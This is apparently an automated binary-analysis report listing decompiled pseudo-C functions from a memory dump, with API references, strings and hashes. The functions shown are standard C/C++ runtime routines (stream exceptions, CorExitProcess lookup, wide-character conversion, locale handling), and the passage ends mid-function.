Function 00402152, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00402152(void* __ecx) {
				signed int _t24;
				void* _t25;
				void* _t29;
				void* _t31;
				signed char _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t48;

				E00424FAC(E00425DCE, __ecx, _t37, _t38, _t39, _t48);
				_t24 =  *(_t39 + 8) & 0x00000017;
				 *(__ecx + 0xc) = _t24;
				_t35 =  *(__ecx + 0x10) & _t24;
				if(_t35 == 0) {
					 *[fs:0x0] =  *((intOrPtr*)(_t39 - 0xc));
					return _t24;
				}
				if( *((char*)(_t39 + 0xc)) == 0) {
					L4:
					_t46 = _t35 & 0x00000004;
					if((_t35 & 0x00000004) == 0) {
						__eflags = _t35 & 0x00000002;
						if((_t35 & 0x00000002) == 0) {
							_t25 = E00407E64(_t35, _t37, _t38, _t48);
							_push("ios_base::eofbit set");
							_push(_t25);
							_push(1);
							_t35 = _t39 - 0x20;
							E00401E88(_t35, _t37, _t38, __eflags, _t48);
							 *(_t39 - 4) = 2;
						} else {
							_t29 = E00407E64(_t35, _t37, _t38, _t48);
							_push("ios_base::failbit set");
							_push(_t29);
							_push(1);
							_t35 = _t39 - 0x20;
							E00401E88(_t35, _t37, _t38, __eflags, _t48);
							 *(_t39 - 4) = 1;
						}
					} else {
						_t31 = E00407E64(_t35, _t37, _t38, _t48);
						_push("ios_base::badbit set");
						_push(_t31);
						_push(1);
						_t35 = _t39 - 0x20;
						E00401E88(_t35, _t37, _t38, _t46, _t48);
						 *(_t39 - 4) =  *(_t39 - 4) & 0x00000000;
					}
					 *(_t39 - 0x20) = 0x427414;
					 *(_t39 - 4) =  *(_t39 - 4) | 0xffffffff;
					_push(0x4367e4);
					_push(_t39 - 0x20);
					L3:
					E0040CD4A();
					goto L4;
				}
				_push(0);
				_push(0);
				goto L3;
			}

0x00402157
0x00402162
0x00402165
0x0040216b
0x0040216d
0x004021fa
0x00402204
0x00402204
0x00402177
0x00402182
0x00402182
0x00402185
0x004021b6
0x004021b9
0x004021d9
0x004021de
0x004021e3
0x004021e4
0x004021e6
0x004021e9
0x004021ee
0x004021bb
0x004021bb
0x004021c0
0x004021c5
0x004021c6
0x004021c8
0x004021cb
0x004021d0
0x004021d0
0x00402187
0x00402187
0x0040218c
0x00402191
0x00402192
0x00402194
0x00402197
0x0040219c
0x0040219c
0x004021a0
0x004021a7
0x004021ae
0x004021b3
0x0040217d
0x0040217d
0x00000000
0x0040217d
0x00402179
0x0040217b
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00402157
__CxxThrowException@8.LIBVCRUNTIME ref: 0040217D

Strings

ios_base::failbit set, xrefs: 004021C0
ios_base::eofbit set, xrefs: 004021DE
ios_base::badbit set, xrefs: 0040218C

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception@8H_prologThrow
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3222999186-1866435925
Opcode ID: 8f30f130baeefc0e6134b10ef3d475fd07a8de106f0c82dced6cb82747ac0982
Instruction ID: 8993c40fbf16f48126efd64f6f5f17f96386f81d0d639bcff329091589d08489
Opcode Fuzzy Hash: 8f30f130baeefc0e6134b10ef3d475fd07a8de106f0c82dced6cb82747ac0982
Instruction Fuzzy Hash: 3911A371900204ABDB00EB94C94ABEEB774AB08308F9081AFF9017A1D1C7BD5E45CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00415C24, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00415C24(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t19;
				signed int _t21;

				_t10 =  *0x438070; // 0xf2c84916
				_v8 = _t10 ^ _t21;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t19 = _t12;
					if(_t19 != 0) {
						 *0x427198(_a4);
						_t12 =  *_t19();
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E0040AEA8();
				return _t12;
			}

0x00415c2b
0x00415c32
0x00415c35
0x00415c39
0x00415c44
0x00415c4c
0x00415c57
0x00415c5d
0x00415c61
0x00415c68
0x00415c6e
0x00415c6e
0x00415c70
0x00415c75
0x00415c7a
0x00415c7a
0x00415c85
0x00415c8d

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00415BD5,?,?,00415B75,?,00436360,0000000C,00415CCC,?,00000002), ref: 00415C44
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000002,?,?,?,00415BD5,?,?,00415B75,?,00436360,0000000C,00415CCC,?,00000002), ref: 00415C57
FreeLibrary.KERNEL32(00000000,?,?,?,00415BD5,?,?,00415B75,?,00436360,0000000C,00415CCC,?,00000002,00000000), ref: 00415C7A

Strings

CorExitProcess, xrefs: 00415C4F
mscoree.dll, xrefs: 00415C3D

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 71742c2f09fceda38da82bdd36fd95bcf63146c8da89c3001bfc9937dae7ad32
Instruction ID: 56ce1c3410d8e7c8cad14efa38a95b78bd45d241605267b9fc361834913d4850
Opcode Fuzzy Hash: 71742c2f09fceda38da82bdd36fd95bcf63146c8da89c3001bfc9937dae7ad32
Instruction Fuzzy Hash: BEF0A430700218FBCB209F60DC0ABEEBFB5EF44701F804069F805A2250DB389981CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE1C, Relevance: 7.7, APIs: 5, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BE1C(void* __edx, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				void* __ebx;
				signed int _t59;
				char* _t61;
				intOrPtr _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t66;
				signed int _t67;
				intOrPtr* _t70;
				short* _t72;
				int _t73;
				int _t75;
				char _t77;
				short* _t82;
				short _t84;
				int _t88;
				int _t91;
				char* _t96;
				int _t101;
				char* _t103;
				void* _t104;
				intOrPtr _t106;
				intOrPtr _t107;
				int _t108;
				short* _t111;
				int _t112;
				int _t115;
				signed int _t117;

				_t104 = __edx;
				_t59 =  *0x438070; // 0xf2c84916
				_v8 = _t59 ^ _t117;
				_t61 = _a4;
				_t88 = _a12;
				_t115 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t111 = _a8;
				_v24 = _t111;
				if(_t61 == 0 || _t88 != 0) {
					if(_t111 != 0) {
						E004105E8(_t88,  &_v48, _t104, _a16);
						_t96 = _v28;
						if(_t96 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t115) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t115, _t111, 0xffffffff, _t115, _t115, _t115,  &_v20);
								if(_t64 == 0 || _v20 != _t115) {
									L55:
									_t65 = E00413C2D();
									_t112 = _t111 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t112 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									_t66 = _t112;
									goto L59;
								}
							}
							_t67 =  *_t111 & 0x0000ffff;
							if(_t67 == 0) {
								L51:
								_t112 = _t115;
								goto L56;
							}
							while(_t67 <= 0xff) {
								_t111 =  &(_t111[1]);
								_t115 = _t115 + 1;
								_t67 =  *_t111 & 0x0000ffff;
								if(_t67 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t106 = _v44;
						if( *((intOrPtr*)(_t106 + 0xa8)) != _t115) {
							if( *((intOrPtr*)(_t106 + 4)) != 1) {
								_t112 = WideCharToMultiByte( *(_t106 + 8), _t115, _t111, 0xffffffff, _t96, _t88, _t115,  &_v20);
								if(_t112 == 0) {
									if(_v20 != _t115 || GetLastError() != 0x7a) {
										L45:
										_t70 = E00413C2D();
										_t115 = _t115 | 0xffffffff;
										 *_t70 = 0x2a;
										goto L51;
									} else {
										if(_t88 == 0) {
											goto L56;
										}
										_t72 = _v24;
										while(1) {
											_t107 = _v44;
											_t101 =  *(_t107 + 4);
											if(_t101 > 5) {
												_t101 = 5;
											}
											_t73 = WideCharToMultiByte( *(_t107 + 8), _t115, _t72, 1,  &_v16, _t101, _t115,  &_v20);
											_t91 = _a12;
											_t108 = _t73;
											if(_t108 == 0 || _v20 != _t115 || _t108 < 0 || _t108 > 5) {
												goto L55;
											}
											if(_t108 + _t112 > _t91) {
												goto L56;
											}
											_t75 = _t115;
											_v32 = _t75;
											if(_t108 <= 0) {
												L43:
												_t72 = _v24 + 2;
												_v24 = _t72;
												if(_t112 < _t91) {
													continue;
												}
												goto L56;
											}
											_t103 = _v28;
											while(1) {
												_t77 =  *((intOrPtr*)(_t117 + _t75 - 0xc));
												 *((char*)(_t103 + _t112)) = _t77;
												if(_t77 == 0) {
													goto L56;
												}
												_t75 = _v32 + 1;
												_t112 = _t112 + 1;
												_v32 = _t75;
												if(_t75 < _t108) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t115) {
									goto L45;
								}
								_t28 = _t112 - 1; // -1
								_t115 = _t28;
								goto L51;
							}
							if(_t88 == 0) {
								L21:
								_t115 = WideCharToMultiByte( *(_t106 + 8), _t115, _t111, _t88, _t96, _t88, _t115,  &_v20);
								if(_t115 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t115 - 1] == 0) {
										_t115 = _t115 - 1;
									}
									goto L51;
								}
							}
							_t82 = _t111;
							_v24 = _t88;
							while( *_t82 != _t115) {
								_t82 =  &(_t82[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t115 &&  *_t82 == _t115) {
								_t88 = (_t82 - _t111 >> 1) + 1;
							}
							goto L21;
						}
						if(_t88 == 0) {
							goto L51;
						}
						while( *_t111 <= 0xff) {
							_t96[_t115] =  *_t111;
							_t84 =  *_t111;
							_t111 =  &(_t111[1]);
							if(_t84 == 0) {
								goto L51;
							}
							_t115 = _t115 + 1;
							if(_t115 < _t88) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E00413C2D())) = 0x16;
					_t66 = E00413708() | 0xffffffff;
					goto L59;
				} else {
					_t66 = 0;
					L59:
					E0040AEA8();
					return _t66;
				}
			}

0x0041be1c
0x0041be24
0x0041be2b
0x0041be2e
0x0041be32
0x0041be36
0x0041be38
0x0041be3b
0x0041be3f
0x0041be42
0x0041be47
0x0041be56
0x0041be76
0x0041be7b
0x0041be80
0x0041c01d
0x0041c026
0x0041c058
0x0041c060
0x0041c06c
0x0041c06c
0x0041c071
0x0041c074
0x00000000
0x0041c067
0x0041c067
0x0041c067
0x0041c07a
0x0041c07e
0x0041c083
0x0041c083
0x0041c08a
0x00000000
0x0041c08a
0x0041c060
0x0041c028
0x0041c02e
0x0041c046
0x0041c046
0x00000000
0x0041c046
0x0041c035
0x0041c03a
0x0041c03d
0x0041c03e
0x0041c044
0x00000000
0x00000000
0x00000000
0x0041c044
0x00000000
0x0041c035
0x0041be86
0x0041be8f
0x0041bec9
0x0041bf42
0x0041bf46
0x0041bf5c
0x0041c00d
0x0041c00d
0x0041c012
0x0041c015
0x00000000
0x0041bf71
0x0041bf73
0x00000000
0x00000000
0x0041bf79
0x0041bf7c
0x0041bf7c
0x0041bf7f
0x0041bf85
0x0041bf89
0x0041bf89
0x0041bf9b
0x0041bfa1
0x0041bfa4
0x0041bfa8
0x00000000
0x00000000
0x0041bfcd
0x00000000
0x00000000
0x0041bfd3
0x0041bfd5
0x0041bfda
0x0041bffa
0x0041bffd
0x0041c000
0x0041c005
0x00000000
0x00000000
0x00000000
0x0041c00b
0x0041bfdc
0x0041bfdf
0x0041bfdf
0x0041bfe3
0x0041bfe8
0x00000000
0x00000000
0x0041bff1
0x0041bff2
0x0041bff3
0x0041bff8
0x00000000
0x00000000
0x00000000
0x0041bff8
0x00000000
0x0041bfdf
0x00000000
0x0041bf7c
0x0041bf5c
0x0041bf4b
0x00000000
0x00000000
0x0041bf51
0x0041bf51
0x00000000
0x0041bf51
0x0041becd
0x0041bef3
0x0041bf06
0x0041bf0a
0x00000000
0x0041bf1a
0x0041bf22
0x0041bf28
0x0041bf28
0x00000000
0x0041bf22
0x0041bf0a
0x0041becf
0x0041bed1
0x0041bed4
0x0041bed9
0x0041bedc
0x0041bedc
0x0041bee0
0x00000000
0x00000000
0x00000000
0x0041bee0
0x0041bee5
0x0041bef2
0x0041bef2
0x00000000
0x0041bee5
0x0041be93
0x00000000
0x00000000
0x0041be9e
0x0041bea9
0x0041beac
0x0041beaf
0x0041beb5
0x00000000
0x00000000
0x0041bebb
0x0041bebe
0x00000000
0x00000000
0x00000000
0x0041bec0
0x00000000
0x0041be9e
0x0041be5d
0x0041be68
0x00000000
0x0041be4d
0x0041be4d
0x0041c08c
0x0041c094
0x0041c09c
0x0041c09c

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d5b012039687762364672122e587374e8263c75103bb4ca90c0cd56b40c99fc
Instruction ID: 1facf790d6c893ffe984a86cc268c959f3a1186e2fe0de56d898fbd95ed5d405
Opcode Fuzzy Hash: 8d5b012039687762364672122e587374e8263c75103bb4ca90c0cd56b40c99fc
Instruction Fuzzy Hash: 03718E31940216DBCB218F99CC84AFFBB75EF59350F14422BE851A7281D7788DC6CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00417337, Relevance: 7.7, APIs: 5, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00417337(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				intOrPtr _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				void* _t244;
				signed int _t247;
				signed int _t249;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t265;
				signed int _t268;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				intOrPtr _t278;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t285;
				intOrPtr _t287;
				signed int _t290;
				signed int _t291;
				signed int _t293;
				signed int _t294;
				signed int _t312;
				signed int _t313;
				signed int _t316;
				signed int _t321;
				void* _t322;
				signed int _t324;
				void* _t325;
				intOrPtr _t326;
				signed int _t330;
				signed int _t331;
				intOrPtr* _t334;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				intOrPtr* _t353;
				signed int _t355;
				signed int _t361;
				intOrPtr* _t365;
				intOrPtr* _t368;
				void* _t371;
				signed int _t372;
				intOrPtr* _t373;
				signed int _t384;
				intOrPtr _t387;
				intOrPtr* _t388;
				signed int _t390;
				signed int* _t394;
				intOrPtr* _t401;
				intOrPtr* _t402;
				intOrPtr _t411;
				signed int _t412;
				short _t413;
				signed int _t414;
				void* _t415;
				signed int _t416;
				signed int _t418;
				intOrPtr _t419;
				signed int _t422;
				intOrPtr _t423;
				signed int _t425;
				signed int _t428;
				intOrPtr _t434;
				signed int _t435;
				signed int _t437;
				signed int _t438;
				signed int _t441;
				signed int _t443;
				signed int _t447;
				signed int* _t448;
				intOrPtr* _t449;
				short _t450;
				void* _t452;
				signed int _t454;
				signed int _t456;
				void* _t458;
				void* _t459;
				void* _t461;
				signed int _t462;
				void* _t463;
				void* _t465;
				signed int _t466;
				void* _t468;
				void* _t470;
				intOrPtr _t482;

				_t411 = __edx;
				_t452 = _t458;
				_t459 = _t458 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t348 = E00415216(__ecx, 0x6a6);
				_t240 = 0;
				_pop(_t361);
				if(_t348 == 0) {
					L20:
					return _t240;
				} else {
					_push(__edi);
					_t418 = _t348 + 4;
					 *_t418 = 0;
					 *_t348 = 1;
					_t434 = _a4;
					_t4 = _t434 + 0x30; // 0x416b36
					_t241 = _t4;
					_push( *_t241);
					_v16 = _t241;
					_push(0x42c624);
					_push( *0x42c4dc);
					E00417276(_t348, _t361, _t418, _t434, _t418, 0x351, 3);
					_t461 = _t459 + 0x18;
					_v8 = 0x42c4dc;
					while(1) {
						L2:
						_t244 = E0041EFE9(_t418, 0x351, 0x42c620);
						_t462 = _t461 + 0xc;
						if(_t244 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t401 = _t8;
							_t330 =  *_v16;
							_v16 = _t401;
							_t402 =  *_t401;
							goto L4;
						}
						while(1) {
							L4:
							_t411 =  *_t330;
							if(_t411 !=  *_t402) {
								break;
							}
							if(_t411 == 0) {
								L8:
								_t331 = 0;
							} else {
								_t411 =  *((intOrPtr*)(_t330 + 2));
								if(_t411 !=  *((intOrPtr*)(_t402 + 2))) {
									break;
								} else {
									_t330 = _t330 + 4;
									_t402 = _t402 + 4;
									if(_t411 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t361 = _v8 + 0xc;
							_v8 = _t361;
							_v12 = _v12 &  !( ~_t331);
							_t334 = _v16;
							_v16 = _t334;
							_push( *_t334);
							_push(0x42c624);
							_push( *_t361);
							E00417276(_t348, _t361, _t418, _t434, _t418, 0x351, 3);
							_t461 = _t462 + 0x18;
							if(_v8 < 0x42c50c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E004155C5(_t348);
									_t31 = _t434 + 0x28; // 0x30ff068b
									_t425 = _t418 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t434 + 0x28; // 0x30ff068b
											E004155C5( *_t32);
										}
									}
									_t33 = _t434 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t425 == 1;
										if(_t425 == 1) {
											_t34 = _t434 + 0x24; // 0x30ff0c46
											E004155C5( *_t34);
										}
									}
									 *(_t434 + 0x24) = 0;
									 *(_t434 + 0x1c) = 0;
									 *(_t434 + 0x28) = 0;
									 *((intOrPtr*)(_t434 + 0x20)) = 0;
									_t39 = _t434 + 0x40; // 0x10468b00
									_t240 =  *_t39;
								} else {
									_t20 = _t434 + 0x28; // 0x30ff068b
									_t428 = _t418 | 0xffffffff;
									_t482 =  *_t20;
									if(_t482 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t482 == 0) {
											_t21 = _t434 + 0x28; // 0x30ff068b
											E004155C5( *_t21);
										}
									}
									_t22 = _t434 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t428 == 1) {
											_t23 = _t434 + 0x24; // 0x30ff0c46
											E004155C5( *_t23);
										}
									}
									 *(_t434 + 0x24) =  *(_t434 + 0x24) & 0x00000000;
									_t240 = _t348 + 4;
									 *(_t434 + 0x1c) =  *(_t434 + 0x1c) & 0x00000000;
									 *(_t434 + 0x28) = _t348;
									 *((intOrPtr*)(_t434 + 0x20)) = _t240;
								}
								goto L20;
							}
							goto L130;
						}
						asm("sbb eax, eax");
						_t331 = _t330 | 0x00000001;
						__eflags = _t331;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00413735();
					asm("int3");
					_push(_t452);
					_t454 = _t462;
					_t463 = _t462 - 0x1d0;
					_t247 =  *0x438070; // 0xf2c84916
					_v56 = _t247 ^ _t454;
					_t249 = _v40;
					_push(_t348);
					_push(_t434);
					_t435 = _v36;
					_push(_t418);
					_t419 = _v44;
					_v508 = _t419;
					__eflags = _t249;
					if(_t249 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t350 = 0;
						_v452 = 0;
						__eflags = _t435;
						if(__eflags == 0) {
							L79:
							_t249 = E00417337(_t350, _t361, _t411, _t419, _t435, __eflags, _t419);
							goto L80;
						} else {
							__eflags =  *_t435 - 0x4c;
							if( *_t435 != 0x4c) {
								L58:
								_push(0);
								_t249 = E00416EFF(_t350, _t411, _t419, _t435, _t435,  &_v276, 0x83,  &_v448, 0x55);
								_t465 = _t463 + 0x18;
								__eflags = _t249;
								if(_t249 != 0) {
									_t361 = 0;
									__eflags = 0;
									_t76 = _t419 + 0x20; // 0x416b26
									_t412 = _t76;
									_t437 = 0;
									_v452 = _t412;
									do {
										__eflags = _t437;
										if(_t437 == 0) {
											L73:
											_t253 = _v456;
										} else {
											_t365 =  *_t412;
											_t254 =  &_v276;
											while(1) {
												__eflags =  *_t254 -  *_t365;
												_t419 = _v464;
												if( *_t254 !=  *_t365) {
													break;
												}
												__eflags =  *_t254;
												if( *_t254 == 0) {
													L66:
													_t361 = 0;
													_t255 = 0;
												} else {
													_t413 =  *((intOrPtr*)(_t254 + 2));
													__eflags = _t413 -  *((intOrPtr*)(_t365 + 2));
													_v458 = _t413;
													_t412 = _v452;
													if(_t413 !=  *((intOrPtr*)(_t365 + 2))) {
														break;
													} else {
														_t254 = _t254 + 4;
														_t365 = _t365 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t255;
												if(_t255 == 0) {
													_t350 = _t350 + 1;
													__eflags = _t350;
													goto L73;
												} else {
													_t256 =  &_v276;
													_push(_t256);
													_push(_t437);
													_push(_t419);
													L83();
													_t412 = _v452;
													_t465 = _t465 + 0xc;
													__eflags = _t256;
													if(_t256 == 0) {
														_t361 = 0;
														_t253 = 0;
														_v456 = 0;
													} else {
														_t350 = _t350 + 1;
														_t361 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t255 = _t254 | 0x00000001;
											_t361 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t437 = _t437 + 1;
										_t412 = _t412 + 0x10;
										_v452 = _t412;
										__eflags = _t437 - 5;
									} while (_t437 <= 5);
									__eflags = _t253;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t350;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t435 + 2) - 0x43;
								if( *(_t435 + 2) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t435 + 4)) - 0x5f;
									if( *((short*)(_t435 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t257 = E00420149(_t435, 0x42c618);
											_t352 = _t257;
											_v472 = _t352;
											_pop(_t367);
											__eflags = _t352;
											if(_t352 == 0) {
												break;
											}
											_t258 = _t257 - _t435;
											__eflags = _t258;
											_v456 = _t258 >> 1;
											if(_t258 == 0) {
												break;
											} else {
												_t260 = 0x3b;
												__eflags =  *_t352 - _t260;
												if( *_t352 == _t260) {
													break;
												} else {
													_t422 = _v456;
													_t353 = 0x42c4dc;
													_v460 = 1;
													do {
														_t261 = E0042010F( *_t353, _t435, _t422);
														_t463 = _t463 + 0xc;
														__eflags = _t261;
														if(_t261 != 0) {
															goto L45;
														} else {
															_t368 =  *_t353;
															_t411 = _t368 + 2;
															do {
																_t326 =  *_t368;
																_t368 = _t368 + 2;
																__eflags = _t326 - _v468;
															} while (_t326 != _v468);
															_t367 = _t368 - _t411 >> 1;
															__eflags = _t422 - _t368 - _t411 >> 1;
															if(_t422 != _t368 - _t411 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t353 = _t353 + 0xc;
														__eflags = _t353 - 0x42c50c;
													} while (_t353 <= 0x42c50c);
													_t350 = _v472 + 2;
													_t262 = E004200BF(_t367, _t350, 0x42c620);
													_t419 = _v464;
													_t438 = _t262;
													_pop(_t371);
													__eflags = _t438;
													if(_t438 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t263 = _v452;
															goto L54;
														} else {
															_push(_t438);
															_t265 = E0041F12B(_t371,  &_v276, 0x83, _t350);
															_t466 = _t463 + 0x10;
															__eflags = _t265;
															if(_t265 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E00413735();
																asm("int3");
																_push(_t454);
																_t456 = _t466;
																_t268 =  *0x438070; // 0xf2c84916
																_v556 = _t268 ^ _t456;
																_push(_t350);
																_t355 = _v540;
																_push(_t438);
																_push(_t419);
																_t423 = _v544;
																_v1292 = _t355;
																_v1276 = E00418C71(_t355, _t371, _t411) + 0x278;
																_push( &_v1256);
																_t275 = E00416EFF(_t355, _t411, _t423, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t468 = _t466 - 0x2e4 + 0x18;
																__eflags = _t275;
																if(_t275 != 0) {
																	_t101 = _t355 + 2; // 0x8
																	_t441 = _t101 << 4;
																	__eflags = _t441;
																	_t276 =  &_v280;
																	_v724 = _t441;
																	_t414 =  *(_t441 + _t423);
																	_t372 = _t414;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t276 -  *_t372;
																		_t443 = _v724;
																		if( *_t276 !=  *_t372) {
																			break;
																		}
																		__eflags =  *_t276;
																		if( *_t276 == 0) {
																			L91:
																			_t277 = _v712;
																		} else {
																			_t450 =  *((intOrPtr*)(_t276 + 2));
																			__eflags = _t450 -  *((intOrPtr*)(_t372 + 2));
																			_v718 = _t450;
																			_t443 = _v724;
																			if(_t450 !=  *((intOrPtr*)(_t372 + 2))) {
																				break;
																			} else {
																				_t276 = _t276 + 4;
																				_t372 = _t372 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t277;
																		if(_t277 != 0) {
																			_t373 =  &_v280;
																			_t415 = _t373 + 2;
																			do {
																				_t278 =  *_t373;
																				_t373 = _t373 + 2;
																				__eflags = _t278 - _v712;
																			} while (_t278 != _v712);
																			_v728 = (_t373 - _t415 >> 1) + 1;
																			_t281 = E00415216(_t373 - _t415 >> 1, 4 + ((_t373 - _t415 >> 1) + 1) * 2);
																			_v740 = _t281;
																			__eflags = _t281;
																			if(_t281 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t443 + _t423));
																				_t125 = _t355 * 4; // 0x982d
																				_v744 =  *((intOrPtr*)(_t423 + _t125 + 0xa0));
																				_t128 = _t423 + 8; // 0x8b56ff8b
																				_v748 =  *_t128;
																				_t382 =  &_v280;
																				_v720 = _t281 + 4;
																				_t284 = E004155FF(_t281 + 4, _v728,  &_v280);
																				_t470 = _t468 + 0xc;
																				__eflags = _t284;
																				if(_t284 != 0) {
																					_t285 = _v712;
																					_push(_t285);
																					_push(_t285);
																					_push(_t285);
																					_push(_t285);
																					_push(_t285);
																					E00413735();
																					asm("int3");
																					_t287 =  *0x439a70; // 0x0
																					return _t287;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t443 + _t423)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t290 = E00416C0C(_t355, _t382, _t423,  &_v708);
																						_t384 = _v712;
																						 *(_t423 + 0xa0 + _t355 * 4) = _t290;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t384 = _v712;
																							 *(_t423 + 0xa0 + _t355 * 4) = _t384;
																						}
																					}
																					__eflags = _t355 - 2;
																					if(_t355 != 2) {
																						__eflags = _t355 - 1;
																						if(_t355 != 1) {
																							__eflags = _t355 - 5;
																							if(_t355 == 5) {
																								 *((intOrPtr*)(_t423 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t423 + 0x10)) = _v716;
																						}
																					} else {
																						_t448 = _v736;
																						_t416 = _t384;
																						_t394 = _t448;
																						 *(_t423 + 8) = _v716;
																						_v720 = _t448;
																						_v728 = _t448[8];
																						_v716 = _t448[9];
																						while(1) {
																							_t154 = _t423 + 8; // 0x8b56ff8b
																							__eflags =  *_t154 -  *_t394;
																							if( *_t154 ==  *_t394) {
																								break;
																							}
																							_t449 = _v720;
																							_t416 = _t416 + 1;
																							_t321 =  *_t394;
																							 *_t449 = _v728;
																							_v716 = _t394[1];
																							_t394 = _t449 + 8;
																							 *((intOrPtr*)(_t449 + 4)) = _v716;
																							_t355 = _v752;
																							_t448 = _v736;
																							_v728 = _t321;
																							_v720 = _t394;
